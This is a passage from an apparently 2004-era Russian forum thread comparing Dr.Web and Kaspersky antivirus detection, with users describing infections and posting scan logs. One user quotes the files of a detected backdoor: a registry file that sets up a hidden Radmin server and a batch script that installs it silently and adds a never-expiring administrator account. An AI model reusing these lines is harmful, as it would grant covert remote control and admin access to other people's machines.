» Dr.Web [DrWeb, Doctor Web, Доктор Веб]

Кто знает что делает вирус Win32.HLLW.MyBot.based

и где о нем можно почитать

AlexPkr
http://www.viruslist.com/viruslistfind.html?findTxt=hllw

Что-то после установки мелкософтовской заплатки от Сассера (WindowsXP-KB835732-x86-RUS) Dr.Web 4.31b стал при выключении компа вызывать синие экраны, и откуда-то стали появляться на диске "С:" странные пустые rar-архивы. Кто-нибудь с этим сталкивался? Сильно не пинайте, если это уже обсуждалось...

И ещё. Каждый раз при загрузке компа в реестре автозагрузки "hklm\software\microsoft\windows\currentversion\run" появляется запись internat2.exe Если её удалить, то при следующей загрузке она вновь появляется

Также при выключении компа появляется окно завершения программы cmd.exe

Всё это очень странно! Жду ваших советов...

Удалил дрВеба, поставил Касперского 5.0.132. Он сразу поймал виря "Backdoor.RA-based", который был в файлах reg.reg и cool.bat (в папках system32 и Temp)
Вот такой был reg.reg:

Цитата:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:31,12,e8,66,7e,cf,e2,5e,98,ae,bb,51,a2,69,68,82
"Port"=hex:47,9f,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

И cool.bat

Цитата:

copy rad32.drv %windir%\system32\raddrv.dll
copy rad32.drv %windir%\system\raddrv.dll
copy mad %windir%\system32\admdll.dll
copy rad32.drv %windir%\system\admdll.dll
copy sysinfo.drv %windir%\system32\sdrrv32.exe
copy sysinfo.drv %windir%\system\sdrrv32.exe
copy x.386 %windir%\system32\reg.reg
copy x.386 %windir%\system\reg.reg
regedt32.exe /s %windir%\system32\reg.reg
regedt32.exe /s %windir%\system\reg.reg
regedit.exe /s %windir%\system32\reg.reg
regedit.exe /s %windir%\system\reg.reg
sdrrv32.exe /install /silence
sdrrv32.exe /start
net user . {getoutofhere} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup "Administrators" "." /ADD

Откуда ентот вирус мог появиться?
PS. Недавно восстанавливал инфу (при помощи EasyRecovery) с харда, который принес друг. Инфа у него полетела, по его словам, от вируса... Из-за этого может быть

namchik
Это очень похоже на удаленную установку Radmina, который позволяет удаленно управлять компьютером. Может поэтоу он его и трояном называет.

namchik

Цитата:

Backdoor.RA-based

Sarancha75

Цитата:

Radmina, который позволяет удаленно управлять компьютером

угу, забавный троянчик. сетка е? а мож друг приходил к тебе трояна подарить?

Цитата:

мож друг приходил к тебе трояна подарить?

Нет, он вообще чайник. Я его хорошо знаю...

Кстати, после удаления трояна глюки остались. Пришлось даже Norton Ghost'ом воспользоваться...

Например, куда-то пропала функция drag'n'drop, т.е. значки просто перестали перетаскиваться мышкой, только через меню "копировать-вставить". Также в меню поиска перестал работать поиск "файлов и папок" (причем остальные 3 пункта работали)
Никто с подобным не сталкивался ?..

namchik
у меня такое было, когда стоял dr.web, долго мучался. Птом поставил АВП он мне понаходил каких-то вирусов и все стало нормально. Про функцию drag'n'drop точно помню, про другое не скажу - не помню.....

Печально. ДроВеба любил за маленький размер дистрибутива Диалап, как-никак... Кстати, замучали его постоянные нападки на отсутствующий Win.exe.Virus, например, в CloneDVD 2.0.9.4 :x

Установил человеку систему и программы, а теперь

1. drweb недоволен. выкинул много вирусов :
TFTP3608 C:\windows\system Win32.HLLW. My boat based
winhlpp32.exe C:\windows\system Win32.HLLW.Agobot
wupdmgt.exe C:\windows\system Win32.HLLW. My boat based
TFTP3236 C:\windows\system Win32.HLLW. My boat based
Что с ними делать?

Периодически в форумах нахожу инфу о том, что drweb не отлавливает Backdoor и Trojan вирусы. Это действительно так или враньё ?
Прежде всего интересует отлов активности вирусов с помощью Spider Guarda в реальном режиме времени.

colonia сожалению, это так, по крайней мере насчет Backdoor. Именно по этой причине пересел на Касперского. Теперь вот сижу, торможу... зато в безопасности...

renreg

Цитата:

Что с ними делать?

а что надо делать с вирусами? проверить эти файлы вторым антивирусом и при подтверждении выбрать опцию "лечить" или "удалить"

Widok

Цитата:

вторым антивирусом

Это чем? Я все ставил на сам, начиная с системы. Все было чисто. А потом выдал эту информацию. У меня дома все ОК, а у клиентки (очень нужной) брыкается в мое отсутствие. Переехать к ней не могу, хоть она и красивая и молодая, а я уже большой (как раз в папы ей гожусь) и женатый ()

И она барышня акуратная - грешить не могу и не лазит неизвестно где.

renreg

Цитата:

Переехать к ней не могу

И не советую, Win32.HLLW.Agobot передаётся половым путём.

colonia
Только что убедился, DrWeb не видит Backdoor.Haxdor, а Касперский нашел его

Looking
Да я в этом тоже недавно убедился, только поздно. Потом два дня все ПО переустанавливал.

не знаю ребята как у вас, но у меня DrWEB вирусы семейства backdoor видит и убивает без проблем
может базы обновлять надо ?

Dr. Web фуфло какое-то

2 дня на компе продержал с обновленной базаой и знаете что?

Потом поставил Касперский 5.0 и количество троянов и вирусов завалило отметку 200.
Такого с моим компом просто некогда небыло!

Я удивляюсь как копм вообще работал
Некому нежелаю раскошеливатся на ЭТО ******.

Sergej768
есть грехи и за его душой... в форуме по каву пишут про грехи кава... и т.д.

renreg

Цитата:

барышня акуратная - грешить не могу и не лазит неизвестно где.

Тому же msblastу достаточно того, что комп к инету подключен, лазить нигде и не требуется, да и на почте давно уже немудрено подцепить.

namchik

Цитата:

зато в безопасности...

"Это ему кажется" (C)

Sergej768

Цитата:

Dr. Web фуфло какое-то 2 дня на компе продержал с обновленной базаой

Цитата:

Потом поставил Касперский 5.0 и количество троянов и вирусов завалило отметку 200.

А что до них стояло ? Или компу 2 дня ?

0nly

Цитата:

Тому же msblastу достаточно того, что комп к инету подключен, лазить нигде и не требуется, да и на почте давно уже немудрено подцепить

Почтой не пользуется - на newmail сайте свои письма читает. Сейчас пора экзаменов (заканчивает университет) и бывает только на университетском сайте, он защищен по всем мыслимым и немыслимым правилам.

renreg
А серфить вообще не надо, msblast сам закачивается на комп без всяких браузеров и сайтов =)

знаете... я бы постеснялся трубить на всех форумах что на компе живет 100-200 червей.

вы считаете что это Касперский хороший потому что их нашел? ну, ну...

лучший антивирус - ниличие головы у пользователя.

BBMike, prus
Я не считаю, что Касперский лучший, у него проблемы с Server 2003 (под котором сижу), тормозит комп, поэтому и поставил DrWeb. Обновляю ежедневно (сидим на оптике). А вчера вдруг пропал Outpost - в логах сообщение об ошибке запуска служб. Просматриваю процессы, автозагрузку и вижу что грузится какой-то w32_ss.exe, ищу в Инете и устанавливаю, что это Backdoor.Haxdor, выбираю по списку все файлы в отдельную папку подсовываю ее под нос DrWeb - не видит, проверяю на сайте Данилова - тоже не видит. Переключился в XP, где есть AVP, обновил базы, нашел вирус. Вот такие факты. Теперь думаю - на что переходить ...
Да - сейчас прямо ставлю вместо корпоративного 2003 стандартый русский, так в нем AVP заработал, а раньше монитор вылетал с ошибкой.

Looking

Цитата:

Теперь думаю - на что переходить ...

это ты так будешь всё жизнь метаться... 100% гарантии не даст ни один антивирус, особенно "за бесплатно"... так что поставь лучше ещё какой-н сканер от другого антивируса, или несколько....

greenfox
При чем здесь метаться. Я просто константирую, что DrWeb не нашел bakdor, котрый есть в списке вирусной энциклопедии. Вывод - плохо с отслеживанием сведений о вирусах, соответственно возможно это и в дальнейшем. Если бы я не имел других средств контроля и был обычным пользователем, то кто-то мог хозяйничать у меня на компе, как у себя дома, а я надеялся, что все хорошо. Далее - не думаю что венигрет из разных антивирусов - это хорошо.
И при чем здесь "забесплатно" - что левые и официальные антивирусники одной и той же версии с работающими ключами по разному находят вирусы?
И еще - пробывал ставить антивирусный модуль DrWeb в Bat - дает ошибки, а от Касперского работает - еще один факт.

Looking
Вирус Backdoor.Haxdor.0 детектится DrWeb'ом с утра 22 числа. Что-то ты не то там ежедневно обновляешь.

PrintScreen
Пути обновления в соответствии с настройкой по умолчанию в DrWeb.
А что на это скажешь?

Dr.Web ® daemon for FreeBSD, version 4.31.4 (April 6, 2004)
Copyright © Igor Daniloff, 1992-2004
Engine version: 4.31b
Total 51333 virus-finding records.
Last update: Fri Jun 25 11:20:02 2004
ntsd.exe - Ok

Dr.Web ® daemon for FreeBSD, version 4.31.4 (April 6, 2004)
Copyright © Igor Daniloff, 1992-2004
Engine version: 4.31b
Total 51333 virus-finding records.
Last update: Fri Jun 25 11:20:02 2004
>debugg.dll - Ok

Результат проверки на сайте Данилова: первый обычный системный файл, второй - с телом вируса


А это на сайте Касперского:

debugg.dll - упакован UPX
debugg.dll - инфицирован Backdoor.Haxdoor.aa
Статистика проверки:
Известных вирусов: 91749 Дата последнего обновления: 25-06-2004
Размер файла (Kb): 29 Тел вирусов: 1
Файлов: 2 Предупреждений: 0
Архивов: 0 Подозрительных: 0

Looking

Цитата:

При чем здесь метаться. Я просто константирую, что DrWeb не нашел bakdor

вопрос о том, что лучше, что хуже и здесь и в других местах обсасывался уже не раз - НЕТ антивируса, который бы ловил всё и не имел глюков!!!!!!!! Поэтому фраза " Теперь думаю - на что переходить" имеет весьма весомые ограничения - что ни поставь, "-" будут!!! Хотя кому нравяться эксперементы - то это не вопрос, тут больше личных предпочтений... так что предлагаю тему "лучше-хуже"замять (или не начинать )

Цитата:

Вывод - плохо с отслеживанием сведений о вирусах, соответственно возможно это и в дальнейшем.

зайди в топик по каву например, или по nav-у - там таких фраз не меньше в отношении этих антивирей...

Цитата:

Далее - не думаю что венигрет из разных антивирусов - это хорошо.

Как понять венигрет!? Практика показывает, что вот это то как раз увеличивает вероятность найти вирус - конечно 2-а монитора ты не поставишь на одну тачку, они будут конфликтовать, а вот иметь на машине неснолько сканеров с обновлёнными версиями - это гуд.... то что не наёдёт один, может найти другой и наоборот...

Цитата:

И при чем здесь "забесплатно"

при том, что от цены зависит качество... но это уже флейм и не сюда...

Цитата:

И еще - пробывал ставить антивирусный модуль DrWeb в Bat - дает ошибки, а от Касперского работает - еще один факт.

Если ты ратуешь в сторону КАВа - то тут никто не против, ставь его и пользуйся, а заодно и топик по каву посетишь, почитаешь... "-" его тоже узнаешь (у тебя там что кстати P4!? )... это больше выбор вкуса, он "не лучше" и "не хуже"...